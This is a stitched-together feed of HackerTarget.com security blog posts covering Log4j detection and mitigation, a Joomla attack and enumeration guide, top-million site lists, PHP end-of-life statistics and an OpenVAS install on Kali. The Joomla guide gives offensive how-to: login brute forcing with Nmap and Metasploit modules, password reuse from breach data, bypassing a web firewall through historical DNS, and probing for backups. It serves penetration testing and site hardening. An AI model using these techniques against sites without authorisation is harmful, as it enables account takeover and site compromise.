Overall, Nessus Essentials 10 is relatively easy to deploy and configure. You can be up and running within 15-20 minutes. This has been a quick review, further testing would be required to see how it scales on a large network and how comprehensive the vulnerability detection plugins are.

It is preferable to have multiple vulnerability scanner options available. Having more than one assists in correlation and provides an assurance that a vulnerability missed by one scanner may be picked up by the second. Our online OpenVAS scan based on the Greenbone Vulnerability Manager is an effective second assessment option, particularly when reviewing Internet-facing systems.

The post Nessus 10 On Ubuntu 20.04 Install And Mini Review appeared first on HackerTarget.com.

Versions of Log4j2 >= 2.0-beta9 and <= 2.16 are all affected by this vulnerability. The vulnerability is easy to exploit and is currently being attacked, with exploitation occurring in the wild.

The CVE is rated 10, and while it is not the first with such a high level, the big problem with this one is the Log4j software is deployed in systems where many will not even realise. It is a Java based dependency of other common software solutions. The scope and impact of this vulnerability won't be fully understood for some time.

Exploitation can occur through a range of vectors, such as stuffing the simple exploit code into a HTTP User Agent, HTTP Referrer, as well as any user supplied input such as web forms and login portals.

Who and What is affected

Product and vendor information can be found at this link that is being updated as new information becomes available.

A small sample of what is affected:

• Minecraft (server and java clients)
• VMware vCenter + many more products
• Apache Tomcat (not by default but if configured)
• Apache Solr
• Logstash
• Elasticsearch
• Graylog
• Security Onion
• Cisco Products (multiple *under investigation)
• UniFi Network Application
• ZAP Proxy

Remediation of CVE-2021-44228

A number of remediation options are available:

Best Option: Patch the Log4j library

Updating Log4j to a secure version (version 2.16.0 2.17.0) is the best way forward. Note that older versions (1.x) are not vulnerable. These have been out of support for many years but are not vulnerable to this issue so are not an immediate priority.

Second Option: Disable the Lookup Function

Unfortunately, there are going to be many outdated Java based systems running in organisations around the world where an upgrade is not an easy option. The system administrators may even be hesitant to touch the system in the event that they break it. Patching is not always an easy fix.

Disabling the Lookup function of the Log4j package is the next best bet. Note that the latest information is that disabling the Lookup function does not mitigate the vulnerability fully. As the issue is still evolving the best strategy is to check the vendor advice. Specific mitigation's may be required, depending on the deployment.

 -Dlog4j2.formatMsgNoLookups=true 

Firewall Application Server (outbound)

Current exploits require the Log4j server to make a connection to another (attacker controlled) system. If possible, firewall outbound connections from the APP server as this will block many attacks. Note that in this case, DNS ex-filtration of data is still possible if the APP server can resolve external DNS (likely).

The use of a firewall is not a fix but it is one layer of defence - and could potentially be implemented quickly.

Detecting the Vulnerability

We now have the ability to detect vulnerable Log4j systems using the latest OpenVAS signatures (rolled out 14/12/21 1600 UTC). The excellent team at Greenbone Networks (OpenVAS/GVM feed maintainers) released new signatures for detecting the vulnerability. In our testing before deployment we confirmed successful detection against a number of vulnerable lab systems. We are monitoring the situation closely and will release any updates as they become available and more information comes to hand.

Vulnerability Scanning for Log4J

Vulnerability Scanners (including OpenVAS / Greenbone Vulnerability Manager / Nesssus etc) using remote only testing will catch the low-hanging fruit; the easily accessible and exploitable Internet-facing systems. We have tested the newly released signatures from Greenbone Networks in our lab and can confirm that they detected a vulnerable version of Apache Solr remotely.

Keep in mind that no vulnerability scanner is 100% accurate. With this vulnerability. in particular, it is unlikely that there will be a vulnerability detection released that can definitively say that the vulnerability is present with a remote only scan. The problem is the attack surface is huge and varied. The number of places the malicious string could find its way to an instance of Log4j is almost endless.

Knowing your Software (assets)

The ideal solution for detection is knowing the software you have running within your organisation (accurate asset register) and the ability to patch and update software as required.

Use Attack Surface Mapping Tools and Vulnerability Scanners to find the gaps in your organisations network knowledge. Get the answers to the following questions; what services are you running, and what sites are running on those services. Get immediate benefit in the triage process allowing you to identify which systems to remediate as a priority.

Detection using Canary Tokens

An interesting Honeypot option is available for quick testing of an application. A canary token is a service that will monitor for hits from a query and alert you to the successful hit.

The Canary Tokens are made available for Free by Thinkst Canary - a very well-respected company within the Infosec space.

How the Canary Token Works

The smart people at Thinkst Canary have released a log4j token that will alert you to a successfully triggered Log4j exploit vector.

Getting Started

It's an amazing service, you don't even need to create an account:

1. Create a token, entering your email address for the alert to be sent to.
2. Copy the Log4j trigger code and use it in any forms or input you wish to test within your organisation.

In the example below, we tested the token against an old version of Graylog running in our lab. Pasting the code snippet straight into the search triggered the canary token alerting me to the fact that the vulnerability was present.

The alert was immediate and came straight into my inbox.

After adding the -Dlog4j2.formatMsgNoLookups=true parameter to the elasticsearch jvm.options we tried the same ElasticSearch query and found that the token did not trigger. Confirming both, the vulnerability was present initially, and the fact that the vulnerability has now been remediated.

Wrapping Up

For many security / operations teams the next weeks (or months) will be a challenge. We wish you all the best and we will keep monitoring the situation updating this blog post as needed.

Further Resources

Youtube Internet Storm Center Update - Good information from the Sans ISC.
CERT (CH) - Swiss Government Computer Emergency Response Team
Apache Log4j Security Vulnerabilities - Apache Logging Services pages listing the security vulnerabilities fixed in released versions of Apache Log4j 2
NVD: National Vulnerability Database CVE-2021-44228 Detail

The post Detection of Log4j Vulnerability appeared first on HackerTarget.com.

Additionally, penetration testers or red teams needing to exploit Joomla targets will also find practical hints in this guide.

Introduction to Joomla Security

Recent statistics show Joomla is a popular open-source Content Management System (CMS), with close to 6% of all websites.

It is open-source, free to download, and easy to use. These things make it a popular option. Similar to WordPress's plugins, Joomla allows functionality through "Extensions"

This popularity makes it a target for bad guys aiming to use a compromised web server for malicious purposes.

A lot of Joomla security holes arise from lack of maintenance, not taking passwords seriously, poorly coded extensions and even site backup's left in the web root.

Enumeration and Reconnaissance

Stage 1 is to discover as much technical information regarding the site configuration. This information is essential as it will aid us as we move onto the actual attacking or exploitation phase.

Now is the time to put yourself in the hacker's mindset. Enumeration or reconnaissance can be conducted stealthily with regular web requests used to gather technical information about the site. Or it can be conducted overtly by aggressively brute-forcing web paths to identify the presence of extensions.

Joomla Identification & Version

To determine if the site is running Joomla, and identify the Joomla Core version, three simple methods can be used to determine the version of Joomla in use.

Meta Generator

Check the HTML source of the page for a meta generator tag in the HEAD section of the HTML source. This is the simplest way to determine if Joomla is being used.

This example is taken from the source of a default Joomla install.

<meta name="generator" content="Joomla! - Open Source Content Management" />

joomla.xml

To identify the version we can check the joomla.xml file within the directory /administrator/manifests/files/

https://www.joomla.org/administrator/manifests/files/joomla.xml

Result

/language/en-GB/en-GB.xml

Another option to find the version is the language file.

https://example.site/language/en-GB/en-GB.xml
<version> 3.6.5 </version>

Version in README.txt

If the meta tag has been disabled, check for the presence of /README.txt from the web root of the install. Joomla has the major version at the top of the ReadMe file.

Security Vulnerabilities in Joomla Core

Let's say a site with an older Joomla Core version is discovered by an attacker. This site may be directly exploitable via a security vulnerability in the Joomla core. It also shows the site is not being well maintained.

In a poorly maintained site, other components, such as Extensions or Templates, may not be updated. The likelihood of a successful attack has dramatically improved.

Joomla Extension and version Enumeration

Similar to WordPress's plugins, Joomla allows functionality through "Extensions"
Extensions are broken down into a few types:

• Modules
• Components
• Templates
• Plugins
• Languages

All can be installed as required. Vulnerabilities can arise in any of these when poorly coded, an example could be non-logged in users having access to the same features as logged in users.

Enumeration is attempting to find as many installed extensions as we can, including disabled extensions. Knowing these extensions may allow us to identify the version, and research whether it is vulnerable to known exploits.

Unfortunately, unless you have the administrator account details, there is no easy way to find every single extension of a particular Joomla install.

It is worth noting Joomla has a live list called - Vulnerable Extensions List (VEL)
This list is of vulnerable extensions for which no patch is known to exist. It can be used as a source of information or a place to start when looking at a Joomla site.

Passive

Hints to the extensions and modules present in a site may be found in the HTML source of the page. Once, an add-on is identified additional information can be gathered from the manifest file.

Active

Some extensions do not leave traces in the HTML source. To find all the installed extensions you have to be more aggressive. Several tools can brute force known extension/component list. There is no one size fits all when it comes to Joomla. Using a combination of available tools will get the best results.

One example is the Metasploit Joomla Plugin Scanner. This metasploit auxiliary module uses a wordlist to locate valid paths scanning for extensions and vulnerabilities.

Extension Version Enumeration

You have compiled a list of extensions of the site, now for the version. The design of Joomla means this information isn't forthcoming or comprehensive, especially when attempting to find it quietly.

It is possible you may find the extension version in a manifest file or other resources such as the addon's stylesheets or javascript.

With a valid version you can compare what has been found against known exploits. This comparison will attest if the site is likely vulnerable, before throwing any exploits.

Joomla Template Enumeration

As with extensions, Joomla Templates can contain vulnerabilities that may expose the site to compromise. Templates are simply collections of PHP code with HTML and CSS resources. Complex templates have additional components and are more prone to security vulnerabilities.

Enumeration of the template is conducted similarly to detecting the extensions. Inspect the HTML and locate the template. Alternatively, run a passive scan on Hacker Target's Joomla Security Scan and scroll through results to find the Joomla Template.

One important factor when testing for vulnerable Joomla Templates and components is where it may be installed but not active; as the code is still accessible it may still be vulnerable. For this reason, brute force testing for template paths is an additional step when assessing an unknown Joomla installation.

Enumerate Users

A quick tip is first see if the Administrator login page is publicly available.

https://exampledomain.com/administrator

Gather a list of valid usernames and attempt a password guessing attack to brute force the login credentials. The aim is to gain access to the administrator account. Admin access gives the attacker complete access, and consequently a full compromise of the site, the database, and remote code execution on the server through PHP code execution.

There is no simple way to do this manually in Joomla as opposed to WordPress where it may be possible to iterate through the users using a simple bash one-liner.

With Joomla, it requires guesswork. All new installs have a 'Super Administrator account' called admin. As part of the install, Joomla requests a password for this account. Joomla also suggests changing the name of the account from 'admin' to something more difficult to guess.

This makes it complicated for a dictionary-based attack against the admin panel.

Enumerating users through Guessing

Start with the common one admin and go from there.

Joomla doesn't seem to allow direct listing all users and / or leak their information.

A default install of Joomla allows 3 privileged user groups which have access to the control panel:

• Managers: content creation and backend system info.
• Administrators: admin functions except global options.
• Super Users/Administrator: ultimate power. Access all areas.

Note: from version 3.2 two-factor authentication was implemented as a core feature. Admins can enable it from User Manager in the Control Panel.

Password Re-use and Breach Datasets

A common technique used in targeted attacks is mining breach datasets for passwords. If a user is breached on another site, there is a chance they will use the same password or a variation on the password on other sites. Working from a targeted domain passwords can quickly be found especially in larger organisations.

Directory Indexing

A misconfigured server can allow you to view the contents of a directory in a web-accessible path.

Viewing the contents of the directory allows an attacker to gather sensitive information not intended for public viewing about the existence and contents of the files. Such as hidden files, backup files, config files, plugins, and templates, without the need to brute force the paths.

Start by browsing to folder locations and see if you get a 200 OK HTTP response and see a list of files / folders in the browser.

Network Service Discovery

Here we are checking network services. The main technique used for identifying the servers attack surface is Port Scanning.

An Nmap port scan will identify the network services listening on the server. These could include FTP, SSH, Webmin or even the web server itself. Working from the results of the Port Scan an attacker would identify server applications, versions and look for exploitation opportunities.

Bypass Sucuri or CloudFlare Web Firewall

If the Joomla site is protected by Sucuri or CloudFlare, exploits that might otherwise succeeed could be blocked. Even various reconnaissance techniques can be blocked by these web based firewall (WAF).

By knowing the real IP address of the server it is likely we could bypass the server simply by putting an entry in the clients /etc/hosts file. This works because we bypass the sites DNS that would otherwise send us via the Web Firewall.

Historical DNS Records

A common method is using historical DNS records to identify the real IP address.

Historical DNS records may show the original IP address before the firewall service was implemented.
Mail Records (MX), if mail is hosted on the same server as the website then this will reveal the real host
TXT SPF, records might also reveal IP addresses of interest

TLS / SSL Certificate Searches

TLS / SSL searches against Certificate Transparency Datasets may also find real hostnames associated with the sites actual IP address if they can matched.

JoomlaVS & Other Tools

Passive Joomla Security Scan

Hacker Target hosts a free and simple to use passive Joomla scan. Discover vulnerabilities, web server details, configuration errors, identify template, and test for directory indexing and others.

The freely available tools perform analysis from a simple page grab. Through the examination of the HTML source code, javascript, and a few other open publicly accessible pages, it is possible to gain immediate insights into the state of security on the target site. This is applying only passive analysis methods, without sending any aggressive security scanning.

JoomScan

JoomScan is the OWASP Joomla! Vulnerability Scanner. An open source project written in Perl. Ties some of these enumeration techniques together such as the Joomla version, vulnerabilities and the admin login page.

Check out the the latest version from github https://github.com/rezasp/joomscan

Note this project has not been updated for a number of years

JoomlaVS

JoomlaVS is an Open source Ruby application. Scan for vulnerabilities in components, modules and templates and basic fingerprinting. More info available on the projects at https://github.com/rastating/joomlavs

----------------------------------------------------------------------

     ??? ???????  ??????? ????   ???????      ?????? ???   ???????????
     ?????????????????????????? ????????     ???????????   ???????????
     ??????   ??????   ?????????????????     ???????????   ???????????
??   ??????   ??????   ?????????????????     ???????????? ????????????
????????????????????????????? ??? ??????????????  ??? ??????? ????????
 ??????  ???????  ??????? ???     ??????????????  ???  ?????  ????????

----------------------------------------------------------------------

[+] URL: http://testexample.com/
[+] Started: Mon Jun 12 11:02:01 2020

[+] Found 1 interesting headers.
 |  Server: Apache

[+] Joomla version 2.5.30 identified from language file (en-GB.xml)
[!] Found 8 vulnerabilities affecting this version of Joomla!

[!] Title: Joomla Akeeba Kickstart Unserialize Remote Code Execution
 |  Reference: https://www.exploit-db.com/exploits/35033
 |  Reference: http://www.cvedetails.com/cve/CVE-2014-7228
[i] Fixed in: 3.3.5


[!] Title: Joomla Media Manager File Upload Vulnerability
 |  Reference: https://www.exploit-db.com/exploits/27610
 |  Reference: http://www.cvedetails.com/cve/CVE-2013-5576
[i] Fixed in: 3.1.5


[!] Title: Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities
 |  Reference: https://www.exploit-db.com/exploits/37473
[i] Fixed in: 3


[!] Title: Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution
 |  Reference: https://www.exploit-db.com/exploits/38977
 |  Reference: http://www.cvedetails.com/cve/CVE-2015-8562
[i] Fixed in: 3.4.6


[!] Title: Remote Code Execution in third-party PHPMailer library
 |  Reference: http://www.cvedetails.com/cve/CVE-2016-10033
 |  Reference: http://www.cvedetails.com/cve/CVE-2016-10045
[i] Fixed in: 3.6.5


[!] Title: Unauthorised Logins
 |  Reference: http://www.cvedetails.com/cve/CVE-2014-6632
[i] Fixed in: 3.3.3


[!] Title: Denial of Service
 |  Reference: http://www.cvedetails.com/cve/CVE-2014-7229
[i] Fixed in: 3.3.4


[!] Title: Joomla! < 3.6.4 Privilege Escalation
 |  Reference: http://www.cvedetails.com/cve/CVE-2016-9838
[i] Fixed in: 3.6.4


[+] Scanning for vulnerable components...
[!] Found 0 vulnerable components.

------------------------------------------------------------------

[+] Scanning for vulnerable modules...
[!] Found 0 vulnerable modules.

------------------------------------------------------------------

[+] Scanning for vulnerable templates...
[!] Found 0 vulnerable templates.

------------------------------------------------------------------

[+] Finished

CMSMap

As the name implies, CMSMap covers the most popular of the CMS's. An open source project written in Python, this tool has support for Joomla, WordPress and Drupal. Useful for automating a scan for low-hanging fruit.

Download the latest version of CMSMap github: 

git clone https://github.com/Dionach/CMSmap 

Attacking and Exploitation

Brute Force Joomla logins

2013 Joomla 3.2 stable release bought 2FA as part of the core install which adds another challenge to brute-forcing an account. But it isn't enabled by default.

Popping Weak Passwords

Detecting weak passwords for Joomla comes in a variety of ways. There are many ways to to brute force a login page, here are a few.

Nmap NSE Scripts for Joomla

NMAP is most known for network discovery, however, NSE scripts extend the functionality of the popular NMAP port scanner. An Nmap NSE script is particularly helpful for performing a brute-force password play against a Joomla install.

• http-joomla-brute.html
• http-form-brute

    $ nmap -p80 http-joomla-brute example-site

Burpsuite

If there is a login form on the site or you have found the administrator interface, then burp suite can be used to try to brute force the password.

There are other tools around such as JoomBrute, and others such as Hydra and Ncrack, though the latter two are most suited for other protocols.

Metasploit

Rapid7's Metasploit provides a few modules for brute forcing CMS and Joomla for various Joomla versions. One is the Joomla Bruteforce login utility

msf > use auxiliary/scanner/http/joomla_bruteforce_login

Exploit Joomla Extensions

One of the most common reasons for Joomla sites being compromised is vulnerable extensions, modules & plugins. These all contain a large amount of PHP code and come from developers of differing levels of skills, abilities, and focus when it comes to writing software that is secure.

Keeping the Joomla extensions, core and templates updated and/or patched needs to be a routine task for the Joomla administrator of the site.

1,437
published exploits for
Joomla and its components

Joomla Security announcements and Vulnerable extensions list

The Joomla Developer Network has a Security Announcements which provides a feed of recently resolved security issues in Joomla software releases.

As part of the Joomla extension directory, Joomla has a list of Vulnerable extensions .

Exploit Example

An issue was discovered in the Creative Contact Form extension (2019). A directory traversal vulnerability resides in the filename field for uploaded attachments. An attacker could exploit this vulnerability with the "Send me a copy" option to receive any files of the filesystem via email.

Exploit References:
https://packetstormsecurity.com/files/156655/Creative-Contact-Form-4.6.2-Directory-Traversal.html
https://nvd.nist.gov/vuln/detail/CVE-2020-9364#VulnChangeHistorySection

Exploit Joomla Template

While vulnerabilities in templates are not as common as extensions, it is still worth checking the template in use. Check the developers page for security related updates, and if its a custom environment running standard web application testing may discover unpublished vulnerabilities.

In this example of an XSS vulnerability, we see that even the Joomla Core Default template had a vulnerability as recently as 2019.

Exploit References:
https://developer.joomla.org/security-centre/791-20190901-core-xss-in-logo-parameter-of-default-templates.html

Exploiting Joomla Core

Vulnerabilities in Joomla Core are highly valued by an Attacker as it does not depend on a particular extension being installed.

In 2016, 2 critical vulnerabilities allowed privilege escalation by remote users. Attackers were first able to create accounts even if account registration is disabled, and 2nd, increase their privileges on any Joomla site using versions 3.4.4 to 3.6.3. Attackers could then upload a backdoor and ultimately control the site.

Solution was the upgrade to version 3.6.4. Joomla devs released limited information on the the vulnerabilities, however it was enough for groups to figure things out and develop exploits. Exploits in the wild were spotted, some included ones that were automatically uploading backdoors to vulnerable sites.

Exploit References:
CVE-2016-8870
CVE-2016-8869
Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation

Sniff and Capture Credentials over non-secure login

HTTP over TLS should be enabled on any public website in 2020. If only HTTP is used, passwords, logins and session cookies are all sent over the network in the clear. Clear text sessions could be monitored on your local network, or on your Internet providers network or anywhere between the client and server.

With the easy access to Free certificates there is really no reason to be not using HTTPS. Check your TLS configuration with tools such as sslyze.

Vulnerable Server Software

Exploitation of the Joomla site could come from other server components - it is not always the Joomla Web Application that will be the exploitation vector. A simple misconfiguration of a network service or a failure to apply server updates could lead to compromise of the server and all hosted applications.

With the results of an Nmap scan, an attacker will review open services for known vulnerabilities. A small sample of these network services includes FTP, SSH, MySQL & Redis - any of these could lead to server compromise if vulnerable or poorly configured.

Compromise Systems Administration Tools

Related to the previous section, here we are identifying server applications that may lead to compromise of the Joomla site.

An example of this type of tool is phpmyadmin running on the web server. A weak database password or vulnerable version of phpmyadmin would lead to compromise of the database and possibly even code execution.

Discovery of the phpmyadmin installation would usually involve a content discovery scan that would include common paths for phpmyadmin in the content discovery scanner list.

Content Discovery

Looking for sensitive information, database credentials, backups, are just a few few items that can be found with content discovery. Content discovery is attempting to find any interesting items contained within a web path of an application. There are a variety of tools our there catering for this purpose. Choose the one or ones that suit your needs. A few example tools are; DIRB, dirbustor, dirsearch or gobuster.

Common locations to check are:

    /robot.txt
    /backup
    /images/
    /bin/
    /uploads/
    /components/
    /administrator/
    /.htaccess.txt
    /index.html
    /index.php
    /templates/exampletemplate
    /administrator/templates/exampletemplate
    /phpmyadmin/
    /phpinfo.php

Found Backups

Using content discovery a commonly found vulnerability is a site backup. This results from a mistake during system administration where a backup of the folder was taken and left in the publicly accessible web root (eg. /backup.tar.gz).

With a backup an attacker has access to all files of the installation including all installed components as well as the configuration file containing the database location and password.

PHP info

Another commonly found item during content discovery is a file with the PHP function phpinfo(). Site administrators will often create a file in the root of the site such as /phpinfo.php, the function in this file allows the administrator to know what modules, PHP version and many other server configurations are available on the webserver. This information is also valuable to an attacker if the file is forgotten and left on the server.

The post Attacking and Enumerating Joomla appeared first on HackerTarget.com.

Depending on the methodology used, the results can have significant variability. However, having a reasonably accurate list is beneficial to the many use cases these lists can be applied to.

Alexa Top 1 Million

https://www.alexa.com/topsites

Established way back in 1996, Alexa had a popular toolbar addon for web browsers. By using the data collected by the toolbar, Alexa developed a top sites list and made it available via a web application.

The Alexa list, while primarily aimed towards marketers, was used for many research projects. It was reasonably accurate, easily accessible, and became the most well-known resource.

Alexa also offered a Top 1 Million List in CSV format that could be downloaded for Free. This was an excellent resource and it found many use cases.

Now owned by Amazon, they have recently restricted access to the top 1 million list to paying customers. For a time, there was a list available at http://s3.amazonaws.com/alexa-static/top-1m.csv.zip, however, this appears to be no longer updated and incomplete.

Cisco Umbrella

http://s3-us-west-1.amazonaws.com/umbrella-static/index.html

The Cisco Umbrella list is quite different. Still based around the top 1 million most popular sites, the list is put together from Cisco's visibility into DNS traffic. Rather than being primarily around what are the most browsed to sites, they are getting what are the most popular host names being resolved in DNS.

As it is based around popular DNS requests, there are domains in the list that are not in the Alexa list. Subdomains of primary sites that host other web resources (js / css / images) and even tracking domains used by analytics packages.

The use cases for this list tend towards security and network monitoring. The security use case is not surprising given that Cisco maintains and compiles the list.

Majestic Million

https://majestic.com/reports/majestic-million

Publishes a list daily that is compiled after analysis of web crawls. Sites are ranked based on backlinks. This is a similar methodology used by search engines.

Majestic's primary use case is marketing and SEO.

Quantcast

https://www.quantcast.com/

Aimed at marketers the data is based on traffic from "Internet Service Providers and Toolbar Providers". For this reason, the data is only for US based traffic, and updates are provided monthly.

In the past, this was a free resource, but it now requires an account.

Tranco-List.eu

https://tranco-list.eu/

A recently minted list, this Free to download list uses methodology that combines some of the other top 1 million site lists mentioned above. By using a combination of lists they believe they have a more accurate list and have even written a paper to explain it.

Created by the team over at ripe.net; they published an interesting article comparing Alexa, Cisco Umbrella, Majestic & Quantcast.

As shown clearly in this graphic there is very little similarity between the different lists.

Source for this image: ripe.net study showing list similarity

Similar Web

https://www.similarweb.com/top-websites/

Another marketing focused site that offers data. Only the top 50 sites are available from the site unless you upgrade to a paid plan.

Moz

https://moz.com/top-500/download/?table=top500Domains

Moz is a search engine optimization service (SEO). They have a large data set of search related data. Using this, Moz makes available the top 500 sites for Free.

Netcraft

https://trends.netcraft.com/topsites

Established in 1995, Netcraft is another company that has been around since the early days of the Internet. Internet Data Analysis and Security would describe the core functions of Netcraft. They have extensive data on web hosting across the Internet going back to 1995.

Some of the work performed by Netcraft results in the takedown of phishing sites and other cybercrime-related measures.

DomCorp

https://www.domcop.com/

Using data from CommonCrawl and CommonSearch, the DomCop project has compiled a list of the top 10 million sites. Better yet, the full site list is available for Free Download.

CommonCrawl

https://www.commoncrawl.org/

Know Your Attack Surface

From OSINT to Vulnerability Identification

USE CASES & MORE INFO

The post Download Top 1 Million Sites appeared first on HackerTarget.com.

]]> https://hackertarget.com/php-end-of-life/ Thu, 18 Jul 2019 03:19:07 +0000 https://hackertarget.com/?p=13788 As of December 2018 PHP 5 and 7.0 became End of Life. It is now July 2019 and up to 74% of PHP powered sites in the top 1 million are running software that is End of Life. This means there is no support and more importantly if new vulnerabilities are discovered, there will be […]

The post PHP End of Life (a reminder) appeared first on HackerTarget.com.

]]> As of December 2018 PHP 5 and 7.0 became End of Life. It is now July 2019 and up to 74% of PHP powered sites in the top 1 million are running software that is End of Life. This means there is no support and more importantly if new vulnerabilities are discovered, there will be no security fixes released.

Upgrades do take work and major updates can take even more work. People are busy and the reluctance for patching when things are just working is understandable. However, when things go End of Life, there are no more valid reasons to not upgrade. In fact, with the latest releases of PHP there are a number of benefits to upgrading including a significant increase in site speed.

Warning: For those planning to upgrade, being a major version change from 5 to 7 a number of functions were deprecated. Ensure thorough testing is performed so the upgrade process is a smooth one.

PHP End of Life Stats

Methodology

During July we performed a semi regular analysis of WordPress usage in the top 1 million sites. The methodology for this process is to download the default page from the top 1 million sites and performing analysis on the HTTP headers and HTML source of the resulting pages.

The following data is based on sites that reveal the PHP version in the HTTP headers.

The number of sites running unsupported PHP is staggering. Especially considering these are among the highest traffic sites in the world. If a serious security vulnerability were to be discovered in PHP core or a module, these sites would have no way to patch and get protected.

Just show me the Stats!

The number of sites that leak the PHP version in the headers is just over 20% of the Top 1 Million sites.

We found 208806 sites leaking the PHP version of these 154645 are running a version that does not include PHP/7.1 or PHP/7.2 or PHP/7.3.

This is where we get the figure of 74% of sites running PHP that is currently End of Life (unsupported).

PHP versions and WordPress

WordPress will require a minimum PHP version of 7 by the end of the year. This matters because WordPress runs close to 30% of all websites accounting for a large percentage of PHP powered sites.

According to statistics from wordpress.org 37.1% are running End of Life PHP. There is however no detail as to how the version was determined.

Another popular content management system Drupal recommends a minimum PHP version of 7.1.

Important Caveat

Newer versions of PHP do hide the version by default through the expose_php Off directive in the php.ini file, so in the overall PHP statistics we would expect the percentage to be better than the 74% shown in the data we have.

Distributions such as Red Hat, Ubuntu, and Debian can provide security patching to packaged PHP even if the version is no longer supported through the official PHP project. An example of this is ongoing support provided as part of the Ubuntu LTS (long term support) releases. Distribution packaged PHP reveals the distribution in the X-Powered-By and Server: headers.

Examples:
X-Powered-By: PHP/5.6.30-0+deb8u1
Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.1e-fips PHP/5.5.38
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.6.40 

Checking for these Linux distributions shows 25532 sites are using the distributions packaging (this does not verify that these are all supported but some would be). In the chart below you can see the versions with a number using a distribution package for the PHP software.

PHP Vulnerabilities

At the time of the article there are currently 599 PHP vulnerabilties with CVE's. The chart below shows number of PHP vulnerabilities discovered with a CVE score of 6 or higher by month.

As can be seen over the years there has been a steady stream of vulnerabilities discovered. Of course this is the case in any popular and complex piece of software, whether it is commercial or open source software. This is here as simply another reminder that it is time to upgrade your PHP to a current release.

Comparing Microsoft IIS End of Life

For a quick comparison against a very different software environment we examined Microsoft IIS server versions. The IIS web server version aligns closely with the Windows Server releases as can be seen in the table below.

The statistics are based on Microsoft IIS versions found in our survey of the Alexa top 1 million sites.

Total Microsoft-IIS Powered Sites: 67787 (6.8% of top 1M)

Microsoft IIS 7.5 or earlier versions accounts for 30.3% of sites.

IIS Version	# of sites	Windows Version
IIS/4.0	6	Windows NT4.0 with options pack (End of Life)
IIS/5.0	516	Windows 2000 (End of Life)
IIS/5.1	3	Windows XP Professional (End of Life)
IIS/6.0	2049	Windows Server 2003 and XP (End of Life)
IIS/7.0	1761	Windows Server 2008 (End of Life)
IIS/7.5	16176	Windows Server 2008 R2 (End of Life) *
IIS/8.0	4385	Windows Server 2012
IIS/8.5	27616	Windows Server 2012 R2
IIS/10.0	15191	Windows Server 2016 & 2019

* IIS/7.5 is covered by Extended Security Updates until January 14 2020. Extended Security Updates (ESU) are available for the Datacenter, Standard, and Embedded editions of this product, for up to an additional three years past the end of support.

Conclusion

Even if we take into account the caveats and accept that the number would be lower than 74% across all PHP based sites, it is clear that a significant number of sites do need to upgrade. Site administrators need to get to work and fix this issue now. A new vulnerability could appear any day, and if you are not running a support version then that will be a bad day.

Knowing your vulnerability exposure and what services are listening on your network is the first step in keeping your organisation secure. Our service simplifies that first step with hosted online vulnerability scanners. Try it out today. Immediate access is available with a full refund available within 7 days.

Find Vulnerable Servers

Trusted tools. Hosted for easy access.

USE CASES

The post PHP End of Life (a reminder) appeared first on HackerTarget.com.

]]> https://hackertarget.com/install-openvas-gvm-on-kali/ Thu, 14 Mar 2019 03:31:47 +0000 https://hackertarget.com/?p=13358 In this setup guide, we step through the process of getting OpenVAS (GVM) running on Kali 2019. Installing OpenVAS into a Kali-based system is made much easier by the inclusion of a quick setup script. When using Kali Linux for OpenVAS scanning, resource usage should always be taken into account. Whether running Kali in a […]

The post Install OpenVAS (GVM) on Kali 2019 appeared first on HackerTarget.com.

]]> In this setup guide, we step through the process of getting OpenVAS (GVM) running on Kali 2019. Installing OpenVAS into a Kali-based system is made much easier by the inclusion of a quick setup script.

When using Kali Linux for OpenVAS scanning, resource usage should always be taken into account. Whether running Kali in a virtual machine or on bare metal, you will want to have sufficient memory and cpu available for the scanner to be optimised for speed (4 cores & 8GB should be a minimum). If you are hoping to run large numbers of parallel scans, then you will need more resources. Several performance tuning options are available in the OpenVAS scanner configuration file to better use the resources you have available. See our OpenVAS tutorial for details on modifying the configuration file.

Install

First step is to install the packages through apt install openvas.

root@kali:~# apt update
root@kali:~# apt upgrade
root@kali:~# apt install openvas

Config

It is then a simple matter of running the configuration script to get OpenVAS configured with required services, user accounts and the latest NVT updates from the Greenbone Community Feed.

root@kali:~# openvas-setup

The output shown here is a bit daunting, however it is all automated. Assuming all goes well you should soon have a working and up to date OpenVAS installation. The actual time taken for this script will vary depending on download speeds as it is grabbing a fair amount of data for the signatures and CVE data.

[>] Updating OpenVAS feeds
[*] [1/3] Updating: NVT
--2019-03-13 19:08:49--  http://dl.greenbone.net/community-nvt-feed-current.tar.bz2
Resolving dl.greenbone.net (dl.greenbone.net)... 89.146.224.58, 2a01:130:2000:127::d1
Connecting to dl.greenbone.net (dl.greenbone.net)|89.146.224.58|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23071344 (22M) [application/octet-stream]
Saving to: ‘/tmp/greenbone-nvt-sync.FNJU7dvf1u/openvas-feed-2019-03-13-126973.tar.bz2’

/tmp/greenbone-nvt-sync.FNJU7dvf1u/o 100%[=============================================>]  22.00M  2.76MB/s    in 9.5s    

2019-03-13 19:09:00 (2.32 MB/s) - ‘/tmp/greenbone-nvt-sync.FNJU7dvf1u/openvas-feed-2019-03-13-126973.tar.bz2’ saved [23071344/23071344]

2008/
2008/secpod_ms08-054_900045.nasl
2008/secpod_goodtech_ssh_sftp_mul_bof_vuln_900166.nasl
2008/secpod_pi3web_isapi_request_dos_vuln_900402.nasl
2008/secpod_rhinosoft_serv-u_sftp_dos_vuln_900113.nasl
2008/secpod_ms08-068_900057.nasl
2008/gb_opera_file_heap_bof_vuln_win.nasl

....

[*] [2/3] Updating: Scap Data
Greenbone community feed server - http://feed.community.greenbone.net/
This service is hosted by Greenbone Networks - http://www.greenbone.net/

All transactions are logged.

If you have any questions, please use the Greenbone community portal. 
See https://community.greenbone.net for details.

By using this service you agree to our terms and conditions.

Only one sync per time, otherwise the source ip will be temporarely blocked.

receiving incremental file list
./
COPYING
      1,719 100%    1.64MB/s    0:00:00 (xfr#1, to-chk=41/43)
nvdcve-2.0-2002.xml
 19,661,072 100%  396.63kB/s    0:00:48 (xfr#2, to-chk=40/43)
nvdcve-2.0-2003.xml
  5,740,888 100%  372.54kB/s    0:00:15 (xfr#3, to-chk=39/43)


....


